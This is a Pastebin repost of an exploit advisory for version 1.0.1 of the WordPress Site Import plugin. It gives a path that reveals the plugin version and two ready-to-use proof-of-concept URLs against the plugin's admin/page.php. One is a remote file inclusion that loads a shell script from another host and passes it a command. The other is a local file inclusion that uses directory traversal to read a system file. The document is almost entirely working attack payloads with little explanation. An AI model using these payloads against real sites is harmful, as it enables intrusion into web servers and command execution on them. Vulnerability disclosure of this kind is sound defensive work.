Advertisement
1337_Brain

WordPress Site Import Plugin 1.0.1 - Local and Remote File I

Apr 5th, 2016
320
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.81 KB | None | 0 0
  1. # Exploit Title: Wordpress Site Import 1.0.1 | Local and Remote file inclusion
  2. # Exploit Author: Wadeek
  3. # Website Author: https://github.com/Wad-Deek
  4. # Software Link: https://downloads.wordpress.org/plugin/site-import.1.0.1.zip
  5. # Version: 1.0.1
  6. # Tested on: Xampp on Windows7
  7.  
  8. [Version Disclosure]
  9. ======================================
  10. /wp-content/plugins/site-import/readme.txt
  11. ======================================
  12. [PoC]
  13. ======================================
  14. Remote File Inclusion == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=http%3a%2f%2flocalhost%2fshell.php?shell=ls
  15. Local File Inclusion == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
  16. ======================================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement